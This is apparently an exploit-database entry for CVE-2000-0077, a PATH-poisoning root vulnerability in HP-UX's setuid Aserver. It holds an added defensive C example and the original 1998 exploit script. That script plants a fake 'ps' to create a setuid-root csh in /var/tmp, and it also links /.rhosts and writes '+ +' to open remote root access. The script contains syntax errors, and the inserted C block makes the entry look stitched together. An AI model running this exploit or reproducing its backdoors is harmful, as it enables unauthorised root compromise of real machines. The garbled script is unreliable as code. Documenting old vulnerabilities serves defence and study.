HP-UX Aserver PATH Vulnerability

Vulnerability ID: 1105380
Vulnerability type: Unknown
Published: 1998-10-18
Updated: 2009-03-04
CVE ID: CVE-2000-0077
CNNVD-ID: CNNVD-200001-005
Platform: HP-UX
CVSS score: 7.2
|Vulnerability source
https://www.exploit-db.com/exploits/20396
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200001-005
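|Vulnerability details
The Aserver program in the October 1998 release of HP-UX contains a vulnerability. A local user can gain elevated privileges by specifying an alternate PATH, which aserver uses to locate the ps and grep commands.
|Exploit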
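The defect class behind this entry, a setuid program running a helper by bare name through system(), is shown below next to a hardened replacement. This is an added example, not code from HP or from the original advisory; the function names, the fixed PATH value and the decision to drop privileges before running the helper are assumptions made for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Vulnerable pattern, kept for contrast and never called here: system()
 * starts a shell that resolves "ps" through the caller-controlled PATH
 * while the process still holds its setuid privileges. */
int list_processes_unsafe(void)
{
    return system("ps");
}

/* Hardened pattern (hypothetical helper): absolute path only, no shell,
 * a fixed environment, and privileges dropped in the child before exec.
 * Returns the helper's exit status, or -1 on refusal or failure. */
int run_trusted(const char *abs_path, char *const argv[])
{
    static char *const clean_env[] = { "PATH=/usr/bin:/bin", NULL };
    int status;
    pid_t pid;

    if (abs_path == NULL || abs_path[0] != '/')
        return -1;                      /* refuse anything needing a PATH lookup */

    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* Drop setgid, then setuid; abort if either call fails. */
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
            _exit(126);
        execve(abs_path, argv, clean_env);  /* execve never consults PATH */
        _exit(127);                         /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed input: a hostile PATH like the one the advisory describes. */
    char *const argv[] = { "sh", "-c", "echo \"helper sees PATH=$PATH\"", NULL };
    setenv("PATH", ".:/var/tmp", 1);
    printf("exit status: %d\n", run_trusted("/bin/sh", argv));
    return 0;
}
```

With the caller's PATH set to `.:/var/tmp`, the helper still sees only the fixed `PATH=/usr/bin:/bin`, and a bare name such as `ps` is rejected before any fork.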
# source: http://www.securityfocus.com/bid/1929/info
#
# Aserver is a server program that ships with HP-UX versions 10.x and above that is used to interface client applications with the audio hardware. Because it talks to hardware, it is installed setuid root by default. 
#
# During normal execution, Aserver executes "ps" via the system() libcall, relying on the PATH environment variable to do so. As a result, a user can modify their PATH environment variable so that it includes an arbitrary program called 'ps' before executing Aserver. When Aserver is run with the -f argument, the offending system() function will be called and the attacker's version of ps will be executed as root. 
# 
# This is a trivial root compromise.
#

#!/bin/sh
#
# HP-UX aserver.sh - Loneguard 18/10/98
# Simple no brainer path poison followed by a twist [ inspired by DC ;) ]
#
cd /var/tmp
cat < _EOF > ps
#!/bin/sh
cp /bin/csh /var/tmp/.foosh
chmod 4755 /var/tmp/.foosh
_EOF
chmod 755 ps
PATH=.:$PATH
/opt/audio/bin/Aserver -f
if [ -e /var/tmp/.foosh ]
        # Hmmm, you not like that technique?
        cd /tmp
        rm last_uuid
        ln -s /.rhosts last_uuid
        /opt/audio/bin/Aserver -f
        echo "+ +" > /.rhosts
        # Haha, my Kungfu is the best!
fi
echo Crazy MONKEY!
|References

Source: OVAL
Name: oval:org.mitre.oval:def:5549
Link: http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:5549